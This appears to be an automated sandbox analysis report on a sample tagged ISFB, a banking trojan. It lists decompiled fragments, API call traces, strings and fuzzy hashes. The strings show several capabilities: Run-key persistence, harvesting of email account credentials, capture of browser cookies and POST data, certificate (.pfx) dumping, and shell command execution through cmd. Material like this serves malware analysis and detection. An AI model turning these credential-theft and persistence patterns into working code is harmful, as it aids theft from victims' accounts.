								_push(_t115);
								_t108 = E027774AF();
								_v4 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _a8);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E02774644(0xffffffffffffffff, _t98, _v12, _v8);
									_v40 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E027753A8();
									}
									HeapFree( *0x277d1f0, 0, _v24);
								}
								HeapFree( *0x277d1f0, 0, _t115);
								_t107 = 0;
							}
							HeapFree( *0x277d1f0, _t107, _t98);
						}
						HeapFree( *0x277d1f0, _t107, _a20);
					}
					HeapFree( *0x277d1f0, _t107, _t117);
				}
				return _v16;
			}

0x02776a9c
0x02776ab0
0x02776ab2
0x02776ac0
0x02776ac4
0x02776acc
0x02776ad4
0x02776ad4
0x02776ad6
0x02776ae2
0x02776af1
0x02776af6
0x02776af9
0x02776afe
0x02776b01
0x02776b06
0x02776b09
0x02776b15
0x02776b22
0x02776b24
0x02776b2a
0x02776b2f
0x02776b3a
0x02776b3c
0x02776b3f
0x02776b45
0x02776b47
0x02776b50
0x02776b5b
0x02776b5d
0x02776b60
0x02776b60
0x02776b62
0x02776b69
0x02776b6e
0x02776b7b
0x02776b7d
0x02776b82
0x02776b90
0x02776b92
0x02776b97
0x02776b9c
0x02776b9f
0x02776ba4
0x02776baf
0x02776bb1
0x02776bb4
0x02776bb4
0x02776bb6
0x02776bc9
0x02776bcd
0x02776bd2
0x02776bd6
0x02776bd9
0x02776bde
0x02776be9
0x02776beb
0x02776bee
0x02776bee
0x02776bf0
0x02776bf7
0x02776bfa
0x02776bff
0x02776c09
0x02776c0b
0x02776c12
0x02776c2a
0x02776c2e
0x02776c3a
0x02776c3f
0x02776c48
0x02776c59
0x02776c5d
0x02776c66
0x02776c6c
0x02776c79
0x02776c86
0x02776c8c
0x02776c94
0x02776c9a
0x02776ca0
0x02776ca4
0x02776ca8
0x02776cae
0x02776cb2
0x02776cb9
0x02776cc0
0x02776cc4
0x02776ccf
0x02776cd6
0x02776cda
0x02776ce3
0x02776ce3
0x02776cf4
0x02776cf4
0x02776d03
0x02776d09
0x02776d09
0x02776d13
0x02776d13
0x02776d24
0x02776d24
0x02776d32
0x02776d32
0x02776d42

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 02776ABA
GetTickCount.KERNEL32 ref: 02776ACE
wsprintfA.USER32 ref: 02776B1D
wsprintfA.USER32 ref: 02776B3A
wsprintfA.USER32 ref: 02776B5B
wsprintfA.USER32 ref: 02776B79
wsprintfA.USER32 ref: 02776B8E
wsprintfA.USER32 ref: 02776BAF
wsprintfA.USER32 ref: 02776BE9
wsprintfA.USER32 ref: 02776C09
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02776C24
GetTickCount.KERNEL32 ref: 02776C34
RtlEnterCriticalSection.NTDLL(04F395F0), ref: 02776C48
RtlLeaveCriticalSection.NTDLL(04F395F0), ref: 02776C66

Part of subcall function 0277140D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,00000000,02776C79,00000000,04F39630), ref: 02771438
Part of subcall function 0277140D: lstrlen.KERNEL32(00000000,?,00000000,02776C79,00000000,04F39630), ref: 02771440
Part of subcall function 0277140D: strcpy.NTDLL ref: 02771457
Part of subcall function 0277140D: lstrcat.KERNEL32(00000000,00000000), ref: 02771462
Part of subcall function 0277140D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02776C79,?,00000000,02776C79,00000000,04F39630), ref: 0277147F

StrTrimA.SHLWAPI(00000000,0277C2C4,00000000,04F39630), ref: 02776C94

Part of subcall function 027774AF: lstrlen.KERNEL32(04F3887A,00000000,00000000,00000000,02776CA0,00000000), ref: 027774BF
Part of subcall function 027774AF: lstrlen.KERNEL32(?), ref: 027774C7
Part of subcall function 027774AF: lstrcpy.KERNEL32(00000000,04F3887A), ref: 027774DB
Part of subcall function 027774AF: lstrcat.KERNEL32(00000000,?), ref: 027774E6

lstrcpy.KERNEL32(00000000,?), ref: 02776CB2
lstrcat.KERNEL32(00000000,00000000), ref: 02776CC0
lstrcat.KERNEL32(00000000,00000000), ref: 02776CC4
HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 02776CF4
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02776D03
HeapFree.KERNEL32(00000000,00000000,00000000,04F39630), ref: 02776D13
HeapFree.KERNEL32(00000000,?), ref: 02776D24
HeapFree.KERNEL32(00000000,00000000), ref: 02776D32

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
String ID:
API String ID: 1837416118-0
Opcode ID: 85c446525edb784b3e16e663a055633f407722d98e90a926f843e298a55dd742
Instruction ID: 3a33eccb02ba1768691cce4c70804cedd40020cf38658a652e062bf3bef15543
Opcode Fuzzy Hash: 85c446525edb784b3e16e663a055633f407722d98e90a926f843e298a55dd742
Instruction Fuzzy Hash: 01718E72880205AFCB22DB69DC88E5777EDFF4C304B168915F909D3110E735E929DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0540FA32, Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 223memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0542207B: RegQueryValueExA.KERNELBASE(00000000,05406702,00000000,05406702,00000000,?,00000000,00000000,00000000,00000001,75144D40,?,?,?,05412103,Ini), ref: 054220B3
Part of subcall function 0542207B: RtlAllocateHeap.NTDLL(00000000,?), ref: 054220C7
Part of subcall function 0542207B: RegQueryValueExA.ADVAPI32(00000000,05406702,00000000,05406702,00000000,?,?,?,?,05412103,Ini,05406702,00000000,00000001,00000000,75144D40), ref: 054220E1
Part of subcall function 0542207B: RegCloseKey.KERNELBASE(00000000,?,?,?,05412103,Ini,05406702,00000000,00000001,00000000,75144D40,?,?,?,05406702,00000000), ref: 0542210B

HeapFree.KERNEL32(00000000,?,LastTask,?,?), ref: 0540FA72
RtlAllocateHeap.NTDLL(00000000,00010000,LastTask), ref: 0540FA90
HeapFree.KERNEL32(00000000,00000000,0000011A,00000000,00000000,?), ref: 0540FAC1
HeapFree.KERNEL32(00000000,054283F4,0000011B,00000000,00000000,00000000,00000000,?,00000001,054283F4,00000002,?,?), ref: 0540FB38
RtlAllocateHeap.NTDLL(00000000,00000400,LastTask), ref: 0540FBFD
wsprintfA.USER32 ref: 0540FC11
lstrlen.KERNEL32(00000000,00000000), ref: 0540FC1C
HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000), ref: 0540FC36
HeapFree.KERNEL32(00000000,?,LastTask,?,00000008,0000000B,?,?,?,00000001,00000000,?,00000001,054283F4,00000002,?), ref: 0540FC58
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0540FC73
wsprintfA.USER32 ref: 0540FC83
lstrlen.KERNEL32(00000000,00000000), ref: 0540FC8E

Part of subcall function 05402661: lstrlen.KERNEL32(05404B43,054160B5,00000000,75145520,?,?,05404B43,00000126,00000000,-00000005,00000000), ref: 05402691
Part of subcall function 05402661: RtlAllocateHeap.NTDLL(00000000,00000000,054160B5), ref: 054026A7
Part of subcall function 05402661: memcpy.NTDLL(00000010,05404B43,00000000,?,?,05404B43,00000126,00000000), ref: 054026DD
Part of subcall function 05402661: memcpy.NTDLL(00000010,00000000,00000126,?,?,05404B43,00000126), ref: 054026F8
Part of subcall function 05402661: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000119,00000001), ref: 05402716
Part of subcall function 05402661: GetLastError.KERNEL32(?,?,05404B43,00000126), ref: 05402720
Part of subcall function 05402661: HeapFree.KERNEL32(00000000,00000000,?,?,05404B43,00000126), ref: 05402746

HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000), ref: 0540FCA8
HeapFree.KERNEL32(00000000,?,?,00000001,00000000,?,00000001,054283F4,00000002,?,?), ref: 0540FCB8

Strings

LastTask, xrefs: 0540FA45, 0540FB79
Cmd %u parsing: %u, xrefs: 0540FC7D
Cmd %s processed: %u, xrefs: 0540FC0B

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Allocate$lstrlen$QueryValuememcpywsprintf$CallCloseErrorLastNamedPipe
String ID: Cmd %s processed: %u$Cmd %u parsing: %u$LastTask
API String ID: 3733591251-3332907627
Opcode ID: c533ae78dfd22e1314e4531a3613730a0c8394593aacf0ce671d254c99c1ec58
Instruction ID: 02afaf80d491c11910f90b0ce0ab6b6ea35ce9650c882ccdecd811d69e8e0e32
Opcode Fuzzy Hash: c533ae78dfd22e1314e4531a3613730a0c8394593aacf0ce671d254c99c1ec58
Instruction Fuzzy Hash: C0717AB1914228BFDB34AFA1DC89DEFBFB9FB04344B61447AF501A2280CB715945CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0540205E, Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 129memoryregistrythreadCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 05402079
RtlEnterCriticalSection.NTDLL(00000000), ref: 05402096
CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 054020E6
DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 054020F0
GetLastError.KERNEL32 ref: 054020FA
HeapFree.KERNEL32(00000000,00000000), ref: 0540210B
HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 0540212D
HeapFree.KERNEL32(00000000,?), ref: 05402164
RtlLeaveCriticalSection.NTDLL(00000000), ref: 05402178
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 05402181
SuspendThread.KERNEL32(?), ref: 05402190
CreateEventA.KERNEL32(0542E0E4,00000001,00000000), ref: 054021A4
SetEvent.KERNEL32(00000000), ref: 054021B1
CloseHandle.KERNEL32(00000000), ref: 054021B8
Sleep.KERNEL32(000001F4), ref: 054021CB
ResumeThread.KERNEL32(?), ref: 054021EF

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0540206A

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
String ID: Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 1011176505-1428018034
Opcode ID: d70e1dff23df265c015e546ebc4c5c90af589f375d097a99479dd4310aa07344
Instruction ID: b992cdfd7570d0a75eef49813154ed23559375e130faf6011b4f3d2df20a1553
Opcode Fuzzy Hash: d70e1dff23df265c015e546ebc4c5c90af589f375d097a99479dd4310aa07344
Instruction Fuzzy Hash: 10419075914229FFDB249F90DC8D8EEBF79FB04340BA144BAF602E2291CB714991CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0541161E, Relevance: 29.8, APIs: 9, Strings: 8, Instructions: 85librarymemoryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(WININET.DLL,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0540202D,?), ref: 05411637
TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,0540202D,?), ref: 05411641
LoadLibraryA.KERNEL32(ieframe,?,?,?,?,?,?,?,?,0540202D,?), ref: 05411663
LoadLibraryA.KERNEL32(ieui,?,?,?,?,?,?,?,?,0540202D,?), ref: 0541166A
LoadLibraryA.KERNEL32(mshtml,?,?,?,?,?,?,?,?,0540202D,?), ref: 05411671
LoadLibraryA.KERNEL32(inetcpl.cpl,?,?,?,?,?,?,?,?,0540202D,?), ref: 05411678
LoadLibraryA.KERNEL32(ieapfltr,?,?,?,?,?,?,?,?,0540202D,?), ref: 0541167F
LoadLibraryA.KERNEL32(urlmon,?,?,?,?,?,?,?,?,0540202D,?), ref: 05411686
HeapFree.KERNEL32(00000000,00000000,00000000,?,0000000C,00000000,WININET.dll,?,?,?,?,?,?,?,?,0540202D), ref: 0541170E

Strings

WININET.DLL, xrefs: 0541162F
mshtml, xrefs: 0541166C
WININET.dll, xrefs: 05411688
ieframe, xrefs: 0541165E
inetcpl.cpl, xrefs: 05411673
urlmon, xrefs: 05411681
ieui, xrefs: 05411665
ieapfltr, xrefs: 0541167A

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad$AllocFreeHeap
String ID: WININET.DLL$WININET.dll$ieapfltr$ieframe$ieui$inetcpl.cpl$mshtml$urlmon
API String ID: 356845663-1120705325
Opcode ID: 02283c739628843accdd372a36254514757144e6b3db44cca3ad86924118ad9c
Instruction ID: a23e63f2acd6da2472a61642681e4c59f7308f2b7699ee7689e81c506a75bfbc
Opcode Fuzzy Hash: 02283c739628843accdd372a36254514757144e6b3db44cca3ad86924118ad9c
Instruction Fuzzy Hash: A521A530E10234FBDB20ABE5C886EEE7FB5BB04650FE010A7F60593240CB705945DB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0540436C, Relevance: 28.2, APIs: 6, Strings: 10, Instructions: 172stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,?,05430468,Port,?,05430468,Secure_Connection,?,05430468,User_Name,?,05430468,Server), ref: 05404444
lstrcpyW.KERNEL32(00000000,05430724), ref: 0540445C
lstrcatW.KERNEL32(00000000,00000000), ref: 05404464
lstrlenW.KERNEL32(00000000,?,05430468,Password2,?,05430468,Port,?,05430468,Secure_Connection,?,05430468,User_Name,?,05430468,Server), ref: 054044A9
memcpy.NTDLL(00000000,?,?,?), ref: 05404502
LocalFree.KERNEL32(?,?), ref: 05404519

Strings

P, xrefs: 054043D8
SMTP, xrefs: 054043B1
IMAP, xrefs: 054043E1
Secure_Connection, xrefs: 05404419
HTTPMail, xrefs: 054043D1
Server, xrefs: 054043F6
Port, xrefs: 05404428
User_Name, xrefs: 0540440D
Password2, xrefs: 0540448E
POP3, xrefs: 054043C1

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
String ID: HTTPMail$IMAP$P$POP3$Password2$Port$SMTP$Secure_Connection$Server$User_Name
API String ID: 3649579052-2088458108
Opcode ID: ec069ec9c28aa185e07fc600e140a7d579076e17672df540d099dd4de59041de
Instruction ID: b754e4aea0cc1573405694ce9f8496331f5edb709f14ce54b8cdff7447652b56
Opcode Fuzzy Hash: ec069ec9c28aa185e07fc600e140a7d579076e17672df540d099dd4de59041de
Instruction Fuzzy Hash: F0516571A04219ABCF20AFA6CC49DEF7BB9BF44304F24552BF605F2290DBB08611DB60

Uniqueness

Uniqueness Score: -1.00%

Function 05412B34, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 156memorystringfileCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 05412B4B
lstrlen.KERNEL32(?), ref: 05412B52
RtlAllocateHeap.NTDLL(00000000,?), ref: 05412B69
lstrcpy.KERNEL32(00000000,?), ref: 05412B7A
lstrcat.KERNEL32(?,?), ref: 05412B96
lstrcat.KERNEL32(?,.pfx), ref: 05412BA0
RtlAllocateHeap.NTDLL(00000000,?), ref: 05412BB1
RtlAllocateHeap.NTDLL(00000000,?), ref: 05412C49
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 05412C79
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 05412C92
CloseHandle.KERNEL32(00000000), ref: 05412C9C
HeapFree.KERNEL32(00000000,?), ref: 05412CAC
HeapFree.KERNEL32(00000000,00000000), ref: 05412CC7
HeapFree.KERNEL32(00000000,?), ref: 05412CD7

Strings

ISFB, xrefs: 05412C2C, 05412C31, 05412C59
.pfx, xrefs: 05412B98

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
String ID: .pfx$ISFB
API String ID: 333890978-2368466137
Opcode ID: 0b88b99010b22cf4c14a6987de624206cd6dc530f364a9fb19370c9688d9cd70
Instruction ID: aa45827a150dac291e7b83c6b7436cb8145923281a6e131f1f75c3edb399a31c
Opcode Fuzzy Hash: 0b88b99010b22cf4c14a6987de624206cd6dc530f364a9fb19370c9688d9cd70
Instruction Fuzzy Hash: FA518F76804128BFCB259FA5DC85CEE7F79FB08384B918066FA05E7210DA318E46DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0541EEA3, Relevance: 27.3, APIs: 3, Strings: 15, Instructions: 262memorystringCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,HTTP/1.1 404 Not Found,0000001A,00000000,?,00000000,05414FE7,?,00000000), ref: 0541EF52
HeapFree.KERNEL32(00000000,00000008,?,?), ref: 0541F10B
lstrlen.KERNEL32(00000008,00000000), ref: 0541F15D

Strings

X-Frame-Options, xrefs: 0541F0A6
Content-Length:, xrefs: 0541F144
HTTP/1.1 404 Not Found, xrefs: 0541EF4A
Etag:, xrefs: 0541F082
Content-Security-Policy:, xrefs: 0541F08E
Transfer-Encoding:, xrefs: 0541F136
gzip, xrefs: 0541EFF8
Access-Control-Allow-Origin:, xrefs: 0541F0B0, 0541F0B5, 0541F0C7
Content-Security-Policy-Report-Only:, xrefs: 0541F09A
Content-Type:, xrefs: 0541EF8D
Last-Modified:, xrefs: 0541F076
no-cache, no-store, must-revalidate, xrefs: 0541F063
chunked, xrefs: 0541F131
Cache-Control:, xrefs: 0541F068
Content-Encoding:, xrefs: 0541EFE2, 0541F03B

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: FreeHeaplstrlenmemcpy
String ID: chunked$Access-Control-Allow-Origin:$Cache-Control:$Content-Encoding:$Content-Length:$Content-Security-Policy-Report-Only:$Content-Security-Policy:$Content-Type:$Etag:$HTTP/1.1 404 Not Found$Last-Modified:$Transfer-Encoding:$X-Frame-Options$gzip$no-cache, no-store, must-revalidate
API String ID: 462153822-754885170
Opcode ID: f7bd7d9d144febf015e9965b284480dcc1fbb542e6255807d333b575e49f29b1
Instruction ID: b7735abdd53c9862db01e368f02654b22a7e3ead9dbe476224e05fdfd9eab3f1
Opcode Fuzzy Hash: f7bd7d9d144febf015e9965b284480dcc1fbb542e6255807d333b575e49f29b1
Instruction Fuzzy Hash: F9A17C71600221AFDF54DF66C889AEA3BB8BF08750F61519AEC09AB245D770E845CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0541115E, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 174stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(05959608,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 05411181
lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 05411190
lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 0541119D
lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 054111B5
lstrlen.KERNEL32(0000000D,00000000,00000000,00000000,00000000,00000000,00000000), ref: 054111C1
RtlAllocateHeap.NTDLL(00000000,?), ref: 054111DD
wsprintfA.USER32 ref: 05411295
memcpy.NTDLL(00000000,?,?), ref: 054112DA
InterlockedExchange.KERNEL32(0542E01C,00000000), ref: 054112F8
HeapFree.KERNEL32(00000000,00000000), ref: 0541133B

Part of subcall function 0541E3A0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0541E3C9
Part of subcall function 0541E3A0: memcpy.NTDLL(00000000,?,?), ref: 0541E3DC
Part of subcall function 0541E3A0: RtlEnterCriticalSection.NTDLL(0542E288), ref: 0541E3ED
Part of subcall function 0541E3A0: RtlLeaveCriticalSection.NTDLL(0542E288), ref: 0541E402
Part of subcall function 0541E3A0: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0541E43A

Strings

USER: %s, xrefs: 0541128F
Cookie: , xrefs: 0541122F
Accept-Language: , xrefs: 05411215
Referer: , xrefs: 05411201
URL: %sREF: %sLANG: %sAGENT: %sCOOKIE: %sPOST: , xrefs: 054112C0

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
String ID: Accept-Language: $Cookie: $Referer: $URL: %sREF: %sLANG: %sAGENT: %sCOOKIE: %sPOST: $USER: %s
API String ID: 4198405257-1852062776
Opcode ID: 4b41f43035f76b2cad7c49cd42c9d5c3187f92d15cf56807f77afb498b249c0a
Instruction ID: 6da746bdf765543413f43aeb4120296275a3335d30ae6d3420d3f99ed4619106
Opcode Fuzzy Hash: 4b41f43035f76b2cad7c49cd42c9d5c3187f92d15cf56807f77afb498b249c0a
Instruction Fuzzy Hash: DE519871A00229ABDF24DFA5CC85EEF7BB9FB04244F54416AFD05EB200DB709A15DB98

Uniqueness

Uniqueness Score: -1.00%

Function 05417F38, Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 79stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,?,?,\sols,\sols,0542252F,?,?,%userprofile%\AppData\Local\,?,00000000), ref: 05417F4F
lstrlenW.KERNEL32(\sols,?,00000000), ref: 05417F5A
lstrlenW.KERNEL32(?,?,00000000), ref: 05417F62
RtlAllocateHeap.NTDLL(00000000,?), ref: 05417F77
lstrcpyW.KERNEL32(00000000,?), ref: 05417F88
lstrcatW.KERNEL32(00000000,\sols), ref: 05417F9A
CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000), ref: 05417F9F
lstrcatW.KERNEL32(00000000,054283F0), ref: 05417FAB
lstrcatW.KERNEL32(00000000,?), ref: 05417FB3
CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000), ref: 05417FB8
lstrcatW.KERNEL32(00000000,054283F0), ref: 05417FC4
lstrcatW.KERNEL32(00000000,00000002), ref: 05417FDF
CopyFileW.KERNEL32(?,00000000,00000000,?,00000000), ref: 05417FE7
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 05417FF5

Strings

\sols, xrefs: 05417F38, 05417F39, 05417F59, 05417F98

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
String ID: \sols
API String ID: 3635185113-25449109
Opcode ID: a1ba4a034fac122bfbca0705780540e696f9f916081f1211423eb5a9fd6294f8
Instruction ID: a3a0c76f88975cae5a7b747bf5dc6c23c50e52dd7844b14cdea884716af14591
Opcode Fuzzy Hash: a1ba4a034fac122bfbca0705780540e696f9f916081f1211423eb5a9fd6294f8
Instruction Fuzzy Hash: 9E21D132114325AFD3316F64DC85EBF7FBCEF95680F120419FA0592151DF619806CA69

Uniqueness

Uniqueness Score: -1.00%

Function 05416BD3, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 146registrystringfileCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000), ref: 05416BF7

Part of subcall function 054242E5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,00000000,80000001,?,?,?,?,054033AA,00000000,00000000,00000000), ref: 0542430C
Part of subcall function 054242E5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,054033AA,00000000,00000000,00000000), ref: 05424335
Part of subcall function 054242E5: RegCloseKey.ADVAPI32(?,?,?,054033AA,00000000,00000000,00000000,00000000), ref: 0542436C

RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 05416C32
lstrcpyW.KERNEL32(-00000002,?), ref: 05416C93
lstrcatW.KERNEL32(00000000,.exe), ref: 05416CA1
lstrcpyW.KERNEL32(?), ref: 05416CBB
lstrcatW.KERNEL32(00000000,.dll), ref: 05416CC3

Part of subcall function 0540D7CB: lstrlenW.KERNEL32(?,.dll,?,00000000,0540B607,?,.dll,?,00001000,?,?,?), ref: 0540D7D9
Part of subcall function 0540D7CB: lstrlen.KERNEL32(DllRegisterServer), ref: 0540D7E7
Part of subcall function 0540D7CB: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 0540D7FC

RegCloseKey.ADVAPI32(?,?,?,00000000,?), ref: 05416D21

Part of subcall function 0541EB66: lstrlenW.KERNEL32(00000000,00000000,00000000,75145520,?,?,0540346B,?), ref: 0541EB72
Part of subcall function 0541EB66: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,0540346B,?), ref: 0541EB9A
Part of subcall function 0541EB66: memset.NTDLL ref: 0541EBAC

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,00000000,00000000,?), ref: 05416D56
GetLastError.KERNEL32 ref: 05416D61
HeapFree.KERNEL32(00000000,00000000), ref: 05416D77
RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,?), ref: 05416D89

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 05416BEC
.dll, xrefs: 05416CBD
.exe, xrefs: 05416C9B

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Closelstrlen$HeapOpenQueryValuelstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
String ID: .dll$.exe$Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 2243210721-2351516416
Opcode ID: a6ff78169594dadffb27484a42db8c6244e5b1f6d83ac13ffd52d24aadb840c4
Instruction ID: 020d642c4008a26217d22fbdcf4ccd948b5d7de09ef3c0fe1cc909a4354e92b1
Opcode Fuzzy Hash: a6ff78169594dadffb27484a42db8c6244e5b1f6d83ac13ffd52d24aadb840c4
Instruction Fuzzy Hash: 19416E71A10229BBCB25EBA1CD49EEF7F7EFF04280F51055AF901A6150DB31DA11DB68

Uniqueness

Uniqueness Score: -1.00%

Function 0542152E, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 121processstringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 05421543

Part of subcall function 05412069: lstrlen.KERNEL32(?,00000008,75145519,?,00000000,05411AAB,?,054160B5,75145519,05405E05,75145519,?,00000000,?,05404731,?), ref: 05412078
Part of subcall function 05412069: mbstowcs.NTDLL ref: 05412094

lstrlenW.KERNEL32(00000000,00000000,00000000,77A2DBB0,00000000,cmd /C "%s> %s1"), ref: 0542157C
wcstombs.NTDLL ref: 05421586
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77A2DBB0,00000000,cmd /C "%s> %s1"), ref: 054215B7
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,054221AD), ref: 054215E3
TerminateProcess.KERNEL32(?,000003E5), ref: 054215F9
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,054221AD), ref: 0542160D
GetLastError.KERNEL32 ref: 05421611
GetExitCodeProcess.KERNEL32(?,00000001), ref: 05421631
CloseHandle.KERNEL32(?), ref: 05421640
CloseHandle.KERNEL32(?), ref: 05421645
GetLastError.KERNEL32 ref: 05421649

Strings

cmd /C "%s> %s1", xrefs: 05421534
D, xrefs: 05421557

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
String ID: D$cmd /C "%s> %s1"
API String ID: 2463014471-2226621151
Opcode ID: 79545ba5732d95f0f44789c029b615e52c753b997dea32e757e55e8cb56c6c4d
Instruction ID: 37ea58f8c189ea5583e556429b6a189b513c32e970640f66e0bda2cf9e11af0c
Opcode Fuzzy Hash: 79545ba5732d95f0f44789c029b615e52c753b997dea32e757e55e8cb56c6c4d
Instruction Fuzzy Hash: 6341E771900238FFDB11EFA5CD859EEBBB9FB08240F5490AAF906A3240D6715E45CB65

Uniqueness

Uniqueness Score: -1.00%

Function 05404F5E, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 89registrymemorystringCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(00000000), ref: 05404F6F
GetTempPathA.KERNEL32(00000000,00000000,?,?,0541780D,00000094,00000000,00000000), ref: 05404F87
RtlAllocateHeap.NTDLL(00000000,00000011), ref: 05404F96
GetTempPathA.KERNEL32(00000001,00000000,?,?,0541780D,00000094,00000000,00000000), ref: 05404FA9
GetTickCount.KERNEL32 ref: 05404FAD
wsprintfA.USER32 ref: 05404FBD
